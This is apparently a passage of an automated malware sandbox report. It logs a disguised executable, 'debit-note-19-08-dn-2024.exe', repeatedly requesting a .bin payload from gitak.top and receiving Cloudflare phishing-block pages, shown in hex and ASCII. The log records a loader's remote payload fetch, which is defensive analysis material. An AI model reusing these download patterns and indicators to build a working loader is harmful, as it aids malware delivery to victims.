                              2024-08-26 13:35:54 UTC1369INData Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 65 73 37 5a 7a 36 5a 38 65 6e 6a 57 4c 5a 6a 39 32 52 54 42 77 47 58 38 30 78 49 57 65 37 36 56 65 4d 35 6e 2e 48 34 6e 34 59 59 2d 31 37 32 34 36 37 39 33 35 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22
                              Data Ascii: <input type="hidden" name="atok" value="es7Zz6Z8enjWLZj92RTBwGX80xIWe76VeM5n.H4n4YY-1724679354-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
                              2024-08-26 13:35:54 UTC854INData Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61
                              Data Ascii: tor sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
                              2024-08-26 13:35:54 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.11.2049839172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:36:05 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:36:05 UTC541INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:36:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HN0vfXFIfvHVEcYM5DDxXz7N7%2FXAcxLE24vhcueBVzn1i3PTmkm3WgiwrSF8Nu8drwQu%2Bj41zkD3LFVnE4M16wZ5QdUsA1lz4bpQ9XrycDOL%2BqJFOs7Azmurb%2Fw%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943571ed8658c0-IAD
                              2024-08-26 13:36:05 UTC828INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:36:05 UTC1369INData Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29
                              Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
                              2024-08-26 13:36:05 UTC1369INData Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 7a 71 32 65 6a 42 49 38 79 6f 6c 71 75 61 34 45 70 67 64 38 45 6a 44 32 5a 65 33 47 6f 4f 44 71 34 4e 5f 43 38 63 54 35 67 39 63 2d 31 37 32 34 36 37 39 33 36 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73
                              Data Ascii: <input type="hidden" name="atok" value="zq2ejBI8yolqua4Epgd8EjD2Ze3GoODq4N_C8cT5g9c-1724679365-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
                              2024-08-26 13:36:05 UTC852INData Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65
                              Data Ascii: r sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
                              2024-08-26 13:36:05 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              23192.168.11.2049840172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:36:15 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:36:16 UTC539INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:36:15 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mjO6YR2SkgyV62m9v%2FzLJHgcvdm0oCFwwl1ed7u8mXxx5X48%2FKPZgVwU7twNSjVfTej4YLBaBjayn7RAwT40qlB0gkl%2F6GPl9NMooR2pY0PePMIcznqjcqPXMuA%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9435b3b864827b-IAD
                              2024-08-26 13:36:16 UTC830INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:36:16 UTC1369INData Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a
                              Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:36:16 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 45 6a 68 55 70 30 63 5a 54 75 2e 46 50 47 4e 43 32 61 74 33 78 75 56 68 4d 73 55 37 44 4f 55 69 4d 6b 73 4a 36 33 54 59 4e 61 67 2d 31 37 32 34 36 37 39 33 37 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                              Data Ascii: <input type="hidden" name="atok" value="EjhUp0cZTu.FPGNC2at3xuVhMsU7DOUiMksJ63TYNag-1724679375-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
                              2024-08-26 13:36:16 UTC850INData Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f
                              Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
                              2024-08-26 13:36:16 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.11.2049841172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:36:26 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:36:26 UTC537INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:36:26 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5SLXdRMBnBxBeommIejQHI4fyzpj9YspjL0S5ELMxEX3SVoLluQp4pDvaVATNV%2FHMlapd1yhuXEL9c3RTey%2BdOyzW9zk56BBMizIAPXgwFdwY6PIAyguj1rTdKw%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9435f55c9586f1-IAD
                              2024-08-26 13:36:26 UTC832INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:36:26 UTC1369INData Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20
                              Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:36:26 UTC1369INData Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 78 37 41 30 75 65 32 41 62 67 4e 4e 61 6c 37 5a 39 73 50 4b 56 7a 4d 58 75 54 39 55 75 53 4a 50 55 4f 75 54 6c 4b 31 76 59 78 6b 2d 31 37 32 34 36 37 39 33 38 36 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65
                              Data Ascii: nput type="hidden" name="atok" value="x7A0ue2AbgNNal7Z9sPKVzMXuT9UuSJPUOuTlK1vYxk-1724679386-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
                              2024-08-26 13:36:26 UTC848INData Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e
                              Data Ascii: :hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
                              2024-08-26 13:36:26 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.11.2049842172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:36:36 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:36:37 UTC541INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:36:36 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QJShjbV8OU1tzSJOuBDSm%2F2cYP20SMaq%2F7k5xH3nivXGIj%2FUkLznU1tXluT9yBzFNwYCZzc2QpcL1JUo5Tl1JtWEMrByCb1pp61NrFtqvI4R%2BAYXyCBl5YSvMjg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94363708ffc94f-IAD
                              2024-08-26 13:36:37 UTC828INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:36:37 UTC1369INData Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29
                              Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
